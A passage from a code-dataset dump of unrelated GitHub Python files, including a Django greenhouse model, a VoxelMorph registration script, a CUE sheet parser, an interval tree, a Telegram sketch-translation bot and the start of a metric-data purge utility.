decimal_places = 2)\n\thumidity = models.DecimalField(blank=False, null=False, max_digits = 7, decimal_places = 2)\n\tsoil_moisture_state = models.CharField(max_length = 10, choices = SOIL_MOISTURE)\n\tdate_recorded = models.DateTimeField('Date Recorded', auto_now=True)\n\n\tclass Meta:\n\t\tordering = ('-date_recorded',)\n\n\tdef __str__(self):\n\t\treturn 'Recorded: ' + str(self.date_recorded)\n\nclass ActivityMeta(models.Model):\n\tACTIVITY_CHOICES = (\n\t\t('open_vent','Open Vent'),\n\t\t('close_vent','Close Vent'),\n\t\t('lights_on','Lights On'),\n\t\t('lights_off','Lights Off'),\n\t\t('start_fan','Start Fan'),\n\t\t('stop_fan','Stop Fan'),\n\t\t('water_crops','Water Crops'),\n\t)\n\tactivity = models.CharField(\n\t\tmax_length = 20,\n\t\tchoices = ACTIVITY_CHOICES\n\t)\n\tuser = models.ForeignKey(User,on_delete=models.CASCADE)\n\tdate_recorded = models.DateTimeField(default=timezone.now)\n\t\n\tclass Meta:\n\t\tordering = ('-date_recorded',)\n\t\n\tdef __str__(self):\n\t\treturn 'Recorded: ' + str(self.date_recorded) + ' by ' + str(self.user)","repo_name":"rickynyairo/Raspberry-Pi-Greenhouse-with-Django","sub_path":"ghapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17193732572","text":"from netResponses import *\nfrom ConCat import *\nimport pickle\n# code is broken up into different functions\n\ndef runNetResponses():\n\n # loading animal pictures in data/ directory\n # assuming two categories per context, only two contexts\n # contexts : pets and nonpets\n # categories in pets : cats and dogs (5 images in each category)\n # categories in nonpets: spider and turtle ( 5 images in each category)\n # and five pictures per category\n # you can change this code to reflect your actual data and analysis\n contexts = listdir('data/STIMULI-Shira-F73')\n for i in range(len(contexts)):\n contexts[i] = \"data/STIMULI-Shira-F73/\" + contexts[i]\n directoriesForAnalysis = contexts\n # now we don't want to put a limit on number of file to load for now\n # startFileNumber = 1 \n # endFileNumber = 10\n # filePaths = organize_paths_for(directoriesForAnalysis, endFileNumber)\n filePaths = organize_paths_for(directoriesForAnalysis)\n cnnModel = 'Vgg16'\n\n outputName = cnnModel\n\n # get layer responses for all pictures\n dictionary = find_max_neurons_and_layers_for(outputName, directoriesForAnalysis, filePaths, cnnModel)\n\n # store this dictionary data in a pickle file\n if os.path.exists(\"NeuralLayersDict_stimuli_Data\") == False:\n os.mkdir(\"NeuralLayersDict_stimuli_Data\")\n print(\"creating a pickle file ...\")\n pickle_file = open(\"NeuralLayersDict_stimuli_Data/NeuralLayersDictionary.pkl\", \"wb\")\n pickle.dump(dictionary,pickle_file)\n pickle_file.close()\n print(\"done!\")\n # set up the variable numberOfDataPoints\n numberOfDataPoints = number_of_scatterplot_dots(directoriesForAnalysis)\n\n # save inter-image distances\n run_analytics_suite(dictionary, outputName, filePaths, numberOfDataPoints)\n\n\ndef get_layer_ratios():\n contexts = listdir('data/STIMULI-Shira-F73')\n for i in range(len(contexts)):\n contexts[i] = \"data/STIMULI-Shira-F73/\" + contexts[i]\n directoriesForAnalysis = contexts\n\n filePaths = organize_paths_for(directoriesForAnalysis)\n\n with open(\"layer_category_data.pkl\",'rb') as layCat:\n layCat_df = pickle.load(layCat)\n\n with open(\"layer_context_data.pkl\",'rb') as layCon:\n layCon_df = pickle.load(layCon)\n\n layCon_df.index = os.listdir(\"./data/STIMULI-Shira-F73/\")\n\n ratioCols = list()\n c = 3\n while c <= (len(layCon_df.columns)+2):\n ratioCols.append(layCon_df.columns[c-1])\n c+=3\n print(ratioCols)\n\n topFiveCon = dict()\n bottomFiveCon = dict()\n for layer in ratioCols:\n t5 = layCon_df[layer].sort_values(ascending = False).iloc[0:5]\n topFiveCon[layer+\"_top5\"] = tuple(zip(t5.index,t5.values))\n b5 = layCon_df[layer].sort_values().iloc[0:5]\n bottomFiveCon[layer+\"_least5\"] = tuple(zip(b5.index,b5.values))\n\n pandas.DataFrame(topFiveCon).to_csv(\"topFiveContexts.csv\")\n pandas.DataFrame(bottomFiveCon).to_csv(\"bottomFiveContexts.csv\")\n\n\n categories = list()\n for i in range(1,len(filePaths),5):\n categories.append(filePaths[i])\n print(len(categories))\n print(categories)\n\n layCat_df.index = categories\n\n topFiveCat = dict()\n bottomFiveCat = dict()\n for layer in ratioCols:\n t5 = layCon_df[layer].sort_values(ascending = False).iloc[0:5]\n topFiveCat[layer+\"_top5\"] = tuple(zip(t5.index,t5.values))\n b5 = layCon_df[layer].sort_values().iloc[0:5]\n bottomFiveCat[layer+\"_least5\"] = tuple(zip(b5.index,b5.values))\n\n pandas.DataFrame(topFiveCat).to_csv(\"topFiveCategories.csv\")\n pandas.DataFrame(bottomFiveCat).to_csv(\"bottomFiveCategories.csv\")\n \n \n# compute ratio of in-category/out-category and in-context/out-context\ndef runConCat():\n computeRatios()\n\n# Currently we run nothing, but can un-comment one line to either \n# 1) compute outputs of network for particular data (runNetResponses)\n# 2) compute in/out ratios at each layer (runConCat)\n# runNetResponses()\n# runConCat()\nget_layer_ratios()\n\n","repo_name":"rahul-ohlan/CnnContext","sub_path":"pretrainStudy/SciRepSimul.py","file_name":"SciRepSimul.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8238668862","text":"from docx import Document\nfrom docx.shared import Inches\n\ndocument = Document()\n\n# profile picture\ndocument.add_picture('me.jpg', width=Inches(2.0))\n\n# name phone number and email details\nname = input('What is your name? ')\nphone_number = input('What is your phone number? ')\nemail = input('What is your email? ')\n\ndocument.add_paragraph(name.capitalize() + ' | ' + phone_number + ' | ' + email)\n\n# about me\ndocument.add_heading('About Me')\nabout_me = input('Tell me about yourself: ')\ndocument.add_paragraph(about_me)\n\n# experience one\ndocument.add_heading('Work Experience')\np = document.add_paragraph()\n\ncompany = input('Enter company: ')\nfrom_date = input('Enter from date: ')\nto_date = input('Enter to date')\nposition_roles = input('Describe your roles: ')\n\np.add_run(company + ' ').bold = True\np.add_run(from_date + ' - ' + to_date + '\\n').italic = True\np.add_run(position_roles)\n\n# more experiences\nwhile True:\n has_more_experiences = input('Do you have more experiences? \\'Yes\\' or \\'No\\'')\n if has_more_experiences.lower() == 'yes':\n p = document.add_paragraph()\n\n company = input('Enter company: ')\n from_date = input('Enter from date: ')\n to_date = input('Enter to date')\n position_roles = input('Describe your roles: ')\n\n p.add_run(company + ' ').bold = True\n p.add_run(from_date + ' - ' + to_date + '\\n').italic = True\n p.add_run(position_roles)\n\n else:\n break\n\n# skills\ndocument.add_heading('My Skills')\nskill = input('Enter skill 1: ')\np_skills = document.add_paragraph(skill)\np_skills.style = 'List Bullet'\n\n#more skills\nwhile True:\n has_more_skills = input('Do you have more skills? \\'Yes\\' or \\'No\\'')\n if has_more_skills.lower() == 'yes':\n skill = input('Enter skill 1: ')\n p_skills = document.add_paragraph(skill)\n p_skills.style = 'List Bullet'\n else:\n break\n\n#footer\nsection = document.sections[0]\nfooter = section.footer\np = footer.paragraphs[0]\np.text = 'Made in Kenya!'\n\ndocument.save('cv.docx')\n","repo_name":"makaucodes/cvbuilder-teminal","sub_path":"cvbuilderapp.py","file_name":"cvbuilderapp.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17771267504","text":"import argparse\nimport os\nimport time\n\nimport torch\nimport numpy as np\n\n\n# import voxelmorph with pytorch backend\nos.environ['VXM_BACKEND'] = 'pytorch'\nimport voxelmorph as vxm\n\ndef process_image_pair(moving_path, atlas_path, output_dir, model_path, pair_index):\n # load moving and atlas images\n add_feat_axis = not args.multichannel\n moving = vxm.py.utils.load_volfile(moving_path, add_batch_axis=True, add_feat_axis=add_feat_axis)\n atlas, atlas_affine = vxm.py.utils.load_volfile(atlas_path, add_batch_axis=True, add_feat_axis=add_feat_axis,\n ret_affine=True)\n\n # Find the minimum and maximum values in the moving array to estimate the range\n min_value = np.min(moving)\n max_value = np.max(moving)\n\n # Normalize the moving array to the range [0, 1] and convert to float32\n moving = (moving - min_value) / (max_value - min_value)\n # load and set up model\n model = vxm.networks.VxmDense.load(model_path, device)\n model.to(device)\n model.eval()\n\n # set up tensors and permute\n input_moving = torch.from_numpy(moving).to(device).float().permute(0, 4, 1, 2, 3)\n input_atlas = torch.from_numpy(atlas).to(device).float().permute(0, 4, 1, 2, 3)\n\n # measure time taken for prediction\n start_time = time.time()\n moved, warp = model(input_moving, input_atlas, registration=True)\n end_time = time.time()\n elapsed_time = end_time - start_time\n\n # create output directories if they don't exist\n os.makedirs(output_dir, exist_ok=True)\n moved_output_dir = os.path.join(output_dir, \"predicted_images\")\n warp_output_dir = os.path.join(output_dir, \"warp_files\")\n os.makedirs(moved_output_dir, exist_ok=True)\n os.makedirs(warp_output_dir, exist_ok=True)\n\n # save moved image\n moved_output_path = os.path.join(moved_output_dir, f\"predicted_{pair_index}.nii.gz\")\n moved = moved.detach().cpu().numpy().squeeze()\n vxm.py.utils.save_volfile(moved, moved_output_path, atlas_affine)\n\n # save warp\n warp_output_path = os.path.join(warp_output_dir, f\"warp_{pair_index}.nii.gz\")\n warp = warp.detach().cpu().numpy().squeeze()\n vxm.py.utils.save_volfile(warp, warp_output_path, atlas_affine)\n\n return moved_output_path, warp_output_path, elapsed_time\n\n\n# parse commandline args\nparser = argparse.ArgumentParser()\nparser.add_argument('--moving-dir', default=\"/media/user/Fish-free11/usman/ali/movingtest/movingtest_resized2\",\n help='directory containing moving images')\nparser.add_argument('--atlas', default=\"/media/user/Fish-free11/usman/ali/atlas2/atlas.nii.gz\",\n help='atlas image file')\nparser.add_argument('--output-dir', default=\"/media/user/Fish-free11/usman/ali/output_images/\", help='directory to save output images and warps')\nparser.add_argument('--model', default=\"/media/Usman/pythonUsman/scripts/torch/models/0088.pt\", help='pytorch model for nonlinear registration')\nparser.add_argument('--gpu', default=0, help='GPU number(s) - if not supplied, CPU is used')\nparser.add_argument('--multichannel', action='store_true', help='specify that data has multiple channels')\nargs = parser.parse_args()\n\n# device handling\nif args.gpu and (args.gpu != '-1'):\n device = 'cuda'\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\nelse:\n device = 'cpu'\n os.environ['CUDA_VISIBLE_DEVICES'] = '-1'\n\n# get the list of moving image files\nmoving_files = sorted(os.listdir(args.moving_dir))\n\n# create output directories if they don't exist\nos.makedirs(args.output_dir, exist_ok=True)\nmoved_output_dir = os.path.join(args.output_dir, \"predicted_images\")\nwarp_output_dir = os.path.join(args.output_dir, \"warp_files\")\nos.makedirs(moved_output_dir, exist_ok=True)\nos.makedirs(warp_output_dir, exist_ok=True)\n\ntotal_time = 0 # Initialize total time\n\n# process each image pair\nfor i, moving_file in enumerate(moving_files):\n moving_path = os.path.join(args.moving_dir, moving_file)\n\n # process the image pair\n pair_index = i + 1\n moved_output_path, warp_output_path, elapsed_time = process_image_pair(moving_path, args.atlas, args.output_dir, args.model,\n pair_index)\n print(f\"Image pair {pair_index} processed. Predicted image saved to {moved_output_path}, Warp saved to {warp_output_path}\")\n print(f\"Time taken: {elapsed_time} seconds\")\n\n total_time += elapsed_time # Update total time\n\nprint(f\"Total time taken for all {len(moving_files)} image pairs: {total_time} seconds\")\n","repo_name":"tagodong/tgd","sub_path":"Voxelmorph/scripts/torch/register_updated.py","file_name":"register_updated.py","file_ext":"py","file_size_in_byte":4525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40322231524","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport codecs\nfrom collections import defaultdict\n\nfrom ..utils import trim_quote, read_file, to_unicode as u\nfrom ..meta import Meta\n\n\nclass _CUEParseHandle(object):\n\n def __init__(self):\n self.stag = []\n self.svalue = []\n self.slen = 0\n self.metas = []\n\n def push(self, tag, value):\n self.stag.append(tag)\n self.svalue.append(value)\n self.slen += 1\n\n def pop(self):\n if self.slen > 0:\n self.slen -= 1\n tag = self.stag.pop()\n value = self.svalue.pop()\n return tag, value\n return None, None\n\n def pop_until(self, tag):\n try:\n i = self.stag.index(tag)\n self.stag = self.stag[:i]\n self.svalue = self.svalue[:i]\n self.slen = i\n except ValueError:\n return\n\n def extract(self):\n meta = Meta(_source=u\"CUE\")\n for i in xrange(self.slen):\n meta.set_tag(self.stag[i], self.svalue[i])\n self.metas.append(meta)\n\n def has_tag(self, tag):\n return tag in self.stag\n\n def next_token(self, tag, value):\n if self.has_tag(tag):\n self.extract()\n self.pop_until(tag)\n self.push(tag, value)\n\n def finish(self):\n self.extract()\n self.set_begin_time()\n self.analyse_time()\n\n def build_time_table(self):\n \"\"\"\n Build a time table which each item has time and its tracknumber.\n \"\"\"\n time_table = defaultdict(set)\n for meta in self.metas:\n if u\"_time_begin\" in meta:\n time_table[meta[u\"_file\"]].add(meta[u\"_time_begin\"])\n\n for _f, _l in time_table.items():\n time_table[_f] = sorted(_l, key=_cue_time_to_int)\n\n return time_table\n\n def analyse_time(self):\n \"\"\"\n Analyse the time in all metas.\n \"\"\"\n time_table = self.build_time_table()\n\n for meta in self.metas:\n if meta[u\"_file\"] not in time_table:\n continue\n\n if u\"_time_begin\" in meta:\n index = time_table[meta[u\"_file\"]].index(meta[u\"_time_begin\"])\n if index == len(time_table[meta[u\"_file\"]]) - 1:\n continue\n meta[u\"_time_end\"] = time_table[meta[u\"_file\"]][index + 1]\n\n def set_begin_time(self):\n for meta in self.metas:\n _set_meta_begin_time(meta)\n\n\ndef _set_meta_begin_time(meta):\n if not isinstance(meta, Meta):\n raise TypeError(\"Only Meta instance is allowed\")\n\n if u\"INDEX 00\" in meta:\n meta[u\"_time_begin\"] = meta[u\"INDEX 00\"]\n elif u\"INDEX 01\" in meta:\n meta[u\"_time_begin\"] = meta[u\"INDEX 01\"]\n else:\n meta[u\"_time_begin\"] = u\"00:00:00\"\n\n\ndef _cue_time_to_int(cue_time):\n \"\"\"\n Convert an item from time table, take the CUE time and convert it to integer.\n \"\"\"\n r = re.match(u'''(\\d+):(\\d{2}):(\\d{2})''', cue_time)\n if r is None:\n raise ValueError(\"Invalid CUE Time: %s\" % cue_time)\n\n return int(u\"%s%s%s\" % r.groups())\n\n\ndef _matched_line_rem(textline, cue_handle):\n r = re.search(u'''REM\\s+(?P[^\\s]+)\\s+(?P.+)''',\n textline)\n\n if not r: return False\n\n _tag = u(trim_quote(r.groupdict()[\"rem_tag\"].strip())).upper()\n _value = u(trim_quote(r.groupdict()[\"rem_value\"].strip()))\n\n cue_handle.next_token(_tag, _value)\n return True\n\n\ndef _matched_line_performer(textline, cue_handle):\n r = re.search(u'''PERFORMER\\s+(?P.+)$''',\n textline)\n\n if not r: return False\n\n _performer = u(trim_quote(r.groupdict()[\"performer\"].strip()))\n\n if cue_handle.has_tag(u\"ALBUMARTIST\"):\n cue_handle.next_token(u\"ARTIST\", _performer)\n else:\n cue_handle.next_token(u\"ALBUMARTIST\", _performer)\n return True\n\n\ndef _matched_line_title(textline, cue_handle):\n r = re.search(u'''TITLE\\s+(?P.+)''',\n textline)\n\n if not r: return False\n\n _title = u(trim_quote(r.groupdict()[\"title\"].strip()))\n\n if cue_handle.has_tag(u\"ALBUM\"):\n cue_handle.next_token(u\"TITLE\", _title)\n else:\n cue_handle.next_token(u\"ALBUM\", _title)\n return True\n\n\ndef _matched_line_file(textline, cue_handle):\n r = re.search(u'''FILE\\s+(?P<file>.+)\\s\\w+''',\n textline)\n\n if not r: return False\n\n _file = u(trim_quote(r.groupdict()[\"file\"].strip()))\n\n cue_handle.next_token(u\"_file\", _file)\n return True\n\n\ndef _matched_line_track(textline, cue_handle):\n r = re.search(u'''TRACK\\s+(?P<track_num>\\d+)\\s+AUDIO''',\n textline)\n\n if not r: return False\n\n _tracknum = u(int(trim_quote(r.groupdict()[\"track_num\"].strip())))\n\n cue_handle.next_token(u\"TRACKNUMBER\", _tracknum)\n return True\n\n\ndef _matched_line_index(textline, cue_handle):\n r = re.search(u'''INDEX\\s+(?P<index_num>\\d+)\\s+(?P<timing>.+)''',\n textline)\n\n if not r: return False\n\n _indexnum = u(trim_quote(r.groupdict()[\"index_num\"].strip()))\n _timing = u(trim_quote(r.groupdict()[\"timing\"].strip()))\n\n cue_handle.next_token(u\"INDEX %s\" % _indexnum, _timing)\n\n\ndef parse_cue(filename, encoding=\"utf_8\"):\n '''\n Parse a CUE file\n '''\n cue_handle = _CUEParseHandle()\n cue_content = read_file(filename, encoding=encoding)\n\n for textline in cue_content.split(u\"\\n\"):\n if _matched_line_rem(textline, cue_handle): continue\n if _matched_line_title(textline, cue_handle): continue\n if _matched_line_file(textline, cue_handle): continue\n if _matched_line_performer(textline, cue_handle): continue\n if _matched_line_track(textline, cue_handle): continue\n if _matched_line_index(textline, cue_handle): continue\n\n cue_handle.finish()\n cue_handle.analyse_time()\n\n return cue_handle.metas\n\n\n\n","repo_name":"Gateswong/GatesMusicPet","sub_path":"music_pet/playlist/cue.py","file_name":"cue.py","file_ext":"py","file_size_in_byte":5881,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"9008371920","text":"#!/usr/bin/env python3\n\nfrom collections import namedtuple\nfrom dataclasses import dataclass\nfrom typing import Optional\n\nInterval = namedtuple(\"Interval\", [\"low\", \"high\"])\n\n\n@dataclass\nclass Node:\n interval = Interval(0, 0)\n max_high = 0\n left: Optional[\"Node\"] = None\n right: Optional[\"Node\"] = None\n\n\nclass IntervalTree:\n def __init__(self) -> None:\n self.root: Node | None = None\n\n def check_overlap(self, interval_a: Interval, interval_b: Interval) -> bool:\n return interval_a.low <= interval_b.high and interval_a.high >= interval_b.low\n\n def insert(self, node: Node | None, interval: Interval) -> Node:\n if node is None:\n new_node = Node()\n new_node.interval = interval\n new_node.max_high = interval.high\n if self.root is None:\n self.root = new_node\n return new_node\n\n if interval.low < node.interval.low:\n node.left = self.insert(node.left, interval)\n else:\n node.right = self.insert(node.right, interval)\n\n if node.max_high < interval.high:\n node.max_high = interval.high\n\n return node\n\n def insert_intervals(self, intervals: Interval) -> None:\n for interval in intervals:\n self.insert(self.root, interval)\n\n def is_overlap(self, interval: Interval) -> Interval | None:\n return self.search_overlap(self.root, interval)\n\n def search_overlap(self, node: Node | None, interval: Interval) -> Interval | None:\n if node is None:\n return None\n\n if self.check_overlap(node.interval, interval):\n return node.interval\n\n if node.left and node.left.max_high >= interval.low:\n return self.search_overlap(node.left, interval)\n\n return self.search_overlap(node.right, interval)\n","repo_name":"xxyzz/WordDumb","sub_path":"interval.py","file_name":"interval.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":280,"dataset":"github-code","pt":"21"} +{"seq_id":"18271925017","text":"\"\"\"Test config functionality\n\"\"\"\nimport pytest\n\nfrom shellplot._config import get_option, set_option\n\n\ndef test_option_set_and_get():\n new_figsize = (50, 30)\n set_option(\"figsize\", new_figsize)\n figsize = get_option(\"figsize\")\n assert figsize == new_figsize\n\n\ndef test_not_implemented_option():\n with pytest.raises(NotImplementedError):\n set_option(\"not-existing-option\", 0)\n","repo_name":"CDonnerer/shellplot","sub_path":"tests/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"16538141831","text":"from os import system\nfrom random import randint\nsystem('cls') or None\n\ndict = {}\narray = []\nm=0\nmulheres=''\nwhile True:\n dict['nome'] = input(f'Nome: ')\n gen = input(f'Genero: [M/F] ').upper()\n while gen not in 'MF':\n gen = input(f'Genero: [M/F] ').upper()\n dict['genero'] = gen\n dict['idade'] = randint(18,40)\n array.append(dict.copy())\n\n if dict['genero'] in 'Ff':\n mulheres += dict['nome'] + ' '\n m += dict['idade']\n\n dict.clear()\n system('cls') or None\n\n looping = input(f'Quer continuar? [S/N] ')\n while looping not in 'SsNn':\n looping = input(f'Quer continuar? [S/N]')\n if looping in 'Nn':\n break\n\n\n\nend_array = []\nfor i in range(len(array)):\n if array[i]['idade'] > m/len(array):\n end_array.append(array[i])\n\nprint('-='*30)\nprint(f'- O grupo tem {len(array)} pessoas.')\nprint(f'- A média de idade é de {m/len(array):.2f}')\nprint(f'As mulheres cadastradas foram: {mulheres}')\nprint(f'Lista das pessoas que estão acima da média de idade:')\nfor j in range(len(end_array)):\n print(end_array[j])\n ","repo_name":"JoseClaudiolima/Python","sub_path":"Python-Desafios/d89 a d106/d94.py","file_name":"d94.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37486901495","text":"from bot_commands.help_commands import show_help, show_start, say_hello\nfrom bot_commands.translation_commands import start_translate_sketch_to_photo, start_translate_photo_to_sketch, receive_and_translate_sketch, cancel_generation\nfrom bot_commands.conversation_states import BotConversationStates\n\nfrom telegram import Update\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, ConversationHandler, Filters, CallbackContext\n\nimport os\nfrom os.path import join, dirname\nfrom dotenv import load_dotenv\n\nif __name__ == '__main__':\n dotenv_path = join(dirname(__file__), '..', '.env')\n load_dotenv(dotenv_path)\n del dotenv_path\n\n updater = Updater(os.getenv('TELEGRAM_BOT_TOKEN'))\n\n updater.dispatcher.add_handler(CommandHandler('start', show_start))\n updater.dispatcher.add_handler(CommandHandler('help', show_help))\n updater.dispatcher.add_handler(CommandHandler('hello', say_hello))\n generation_conversation_handler = ConversationHandler(\n entry_points = [\n CommandHandler('sketch2photo', start_translate_sketch_to_photo),\n CommandHandler('photo2sketch', start_translate_photo_to_sketch),\n ],\n states={\n BotConversationStates.RECEIVE_SKETCH: [MessageHandler(Filters.photo, receive_and_translate_sketch)],\n },\n fallbacks=[CommandHandler('cancel', cancel_generation)]\n )\n updater.dispatcher.add_handler(generation_conversation_handler)\n\n updater.start_polling()\n updater.idle()\n","repo_name":"agentS/sketch2photoTelegramBot","sub_path":"src/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11638589365","text":"import numpy as np\nimport math\nimport random\n\n\ndef q(i):\n print(\"Question: \", i)\n\n\nq(1)\nn = 100\np = 0.75\nsize = 1000\nbinomial = np.random.binomial(n, p, size)\ndeviation = math.sqrt(p*(1-p)/n)\nmean = n * p\ntotal = 0\nfor i in binomial:\n if i > (mean + deviation * 2):\n total += 1\n\nprint(\"total 2 standard deviations above mean: \", total)\n\nq(2)\n\n\ndef guess(n):\n r = random.randrange(0, n)\n inp = int(input(\"enter your guess, 0-\" + str(n) + \": \"))\n if(inp > r):\n print(\"too high\")\n else:\n print(\"too low\")\n\n\nguess(100)\n\n\ndef approxPi(n):\n hits = 0\n for i in range(n):\n point = random.random() * 4\n if(point < math.pi):\n hits += 1\n print((hits * 4) / n)\n\n\napproxPi(100000)\n\n\ndef week():\n days = {\n \"Mo\": \"Monday\", \"Tu\": \"Tuesday\", \"We\": \"Wednesday\", \"Th\": \"Thursday\",\n \"Fr\": \"Friday\", \"Sa\": \"Saturday\", \"Su\": \"Sunday\"\n }\n inp = input(\"Enter Day abbreviation: \")\n if inp in days:\n print(days[inp])\n\n\nweek()\nq(3)\n\nyear_populations = [8.89, 10.16, 12.0, 13.9, 15.91, 17.93, 20.07, 22.71, 25.97, 29.0, 32.53, 36.07]\nout = []\nout_2 = []\nfor i in range(len(year_populations) - 1):\n out.append(year_populations[i + 1] / year_populations[i])\n m = year_populations[i + 1] - year_populations[i]\n out_2.append(m / year_populations[i])\nprint(out)\nprint(out_2)\n\ninitial_amount = 16\ndecline = 0.25\n\nfor i in range(100):\n initial_amount = initial_amount * decline\n if initial_amount < 0.1:\n print(\"after \", i, \"hours drug is undetectable\")\n break\n","repo_name":"taydus30/Project-1","sub_path":"hw/hw8.py","file_name":"hw8.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37481516200","text":"\"\"\"\n在TO上测试,算将未见过的类别归为已有类别的概率\n\"\"\"\nimport os\nimport math\nimport argparse\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.optim.lr_scheduler as lr_scheduler\nfrom torchvision import transforms\nfrom torchsampler import ImbalancedDatasetSampler\nimport numpy as np\nfrom PIL import Image\n\nfrom my_dataset import MyDataSet\nfrom models.ViT import vit_base_patch16_224_in21k\nfrom models.ResNet import resnet34, resnet50, resnet101\nfrom models.EfficientNet import efficientnet_b3, efficientnet_b5, efficientnet_b7\nfrom models.Swin import swin_base_patch4_window7_224\nfrom utils import train_one_epoch, evaluate, plot_data_loader_image, plot_original_image\n\n\ndef main(args):\n # 设备 gpu cpu\n device = torch.device(args.device if torch.cuda.is_available() else \"cpu\")\n\n # 默认图像��小都是224,只有efficientnet需要判断\n img_size = 224\n if 'EfficientNet' in args.model_name:\n # EfficientNet对应输入图片的大小\n efficientnet_img_size = {\"b0\": 224, \"b1\": 240, \"b2\": 260, \"b3\": 300, \"b4\": 380, \"b5\": 456, \"b6\": 528, \"b7\": 600}\n num_model = args.model_name[-2:]\n img_size = efficientnet_img_size[num_model]\n\n # 数据预处理\n data_transform = transforms.Compose([transforms.Resize([img_size, img_size]),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n\n # 创建模型\n if args.model_name == 'ResNet50':\n model = resnet50(num_classes=args.num_classes).to(device)\n elif args.model_name == 'ResNet101':\n model = resnet101(num_classes=args.num_classes).to(device)\n elif args.model_name == 'ViT':\n model = vit_base_patch16_224_in21k(num_classes=args.num_classes, has_logits=False).to(device)\n elif args.model_name == 'EfficientNet_b3':\n model = efficientnet_b3(num_classes=args.num_classes).to(device)\n elif args.model_name == 'EfficientNet_b5':\n model = efficientnet_b5(num_classes=args.num_classes).to(device)\n elif args.model_name == 'EfficientNet_b7':\n model = efficientnet_b7(num_classes=args.num_classes).to(device)\n elif args.model_name == 'Swin':\n model = swin_base_patch4_window7_224(num_classes=args.num_classes).to(device)\n else:\n raise Exception(\"No model name {}\".format(args.model_name))\n\n # 载入训练好的权重\n model_weight_path = './weights/{}-w.pth'.format(args.model_name)\n assert os.path.exists(model_weight_path), \"file {} does not exist.\".format(model_weight_path)\n pre_weights = torch.load(model_weight_path, map_location=device)\n model.load_state_dict(pre_weights, strict=False)\n\n # 开集测试\n test_data = np.load('../QHZJ/new_test_data_to.npy')\n test_label = np.load('../QHZJ/new_test_label_to.npy')\n\n # prediction\n model.eval()\n\n total = 0\n wrong = 0\n\n with torch.no_grad():\n for data in test_data:\n print(wrong, total)\n img = Image.fromarray(data)\n img = data_transform(img)\n img = torch.unsqueeze(img, dim=0)\n # predict class\n output = torch.squeeze(model(img.to(device)))\n predict = torch.softmax(output, dim=0)\n predict_cla = torch.argmax(predict).numpy()\n max_assumption = torch.max(predict)\n total += 1\n if max_assumption >= 0.7:\n wrong += 1\n\n print(f'{args.model_name}将未见过的类别归为已有类别的概率:{wrong / total:.3f}')\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n # 分类的类别\n parser.add_argument('--num_classes', type=int, default=1947)\n # 迭代的epoch\n parser.add_argument('--epochs', type=int, default=15)\n # 每个batch的大小\n parser.add_argument('--batch-size', type=int, default=8)\n # 学习率\n parser.add_argument('--lr', type=float, default=0.001)\n # 损失函数\n parser.add_argument('--loss', type=str, default='CrossEntropyLoss')\n # 最终学习率(乘以)\n parser.add_argument('--lrf', type=float, default=0.01)\n # 模型名称,ResNet,ViT\n parser.add_argument('--model-name', default='EfficientNet_b3', help=\"eg:ResNet50 / ViT / EfficientNet_b7 / Swin\")\n # 是否冻结权重\n parser.add_argument('--freeze-layers', type=bool, default=False)\n # 设备\n parser.add_argument('--device', default='cuda:0', help='device id (i.e. 0 or 0,1 or cpu)')\n\n # 解析参数\n opt = parser.parse_args()\n\n main(opt)\n","repo_name":"Mythszj/QHZJ_classification","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8056682293","text":"import argparse\nimport logging\nimport sys\nimport time\n\nimport sqlalchemy as sql\n\nfrom nta.utils.error_handling import logExceptions\nfrom nta.utils.logging_support_raw import LoggingSupport\nfrom nta.utils import sqlalchemy_utils\n\n\nimport htmengine\nimport htmengine.repository\nfrom htmengine.repository import schema\n\n\n\n# Maximum number of rows to delete per query for reducing the likelihood of the\n# MySQL \"Lock wait timeout exceeded\" error\n_MAX_DELETE_BATCH_SIZE = 1000\n\n\n\n# How many seconds to sleep between garbage collection cycles\n_PAUSE_INTERVAL_SEC = 3600\n\n\n\ng_log = logging.getLogger(__name__)\n\n\n\ndef _parseArgs(args):\n \"\"\"Parse command-line arguments\n\n :param list args: the equivalent of sys.argv[1:]\n\n :returns: the args object generated by ``argparse.ArgumentParser.parse_args``\n with the following attributes:\n thresholdDays: Metric data rows with timestamps older than this number of\n days will be purged.\n\n \"\"\"\n parser = argparse.ArgumentParser(description=__doc__)\n\n parser.add_argument(\n \"--threshold-days\",\n type=int,\n required=True,\n dest=\"thresholdDays\",\n metavar=\"D\",\n help=(\"Metric data rows with timestamps older than this number of days \"\n \"will be purged. The metric data timestamps are assumed to be \"\n \"UTC.\"))\n\n\n args = parser.parse_args()\n\n\n if args.thresholdDays <= 0:\n parser.error(\"--days value must be greater than zero, but got {}\".format(\n args.thresholdDays))\n\n\n return 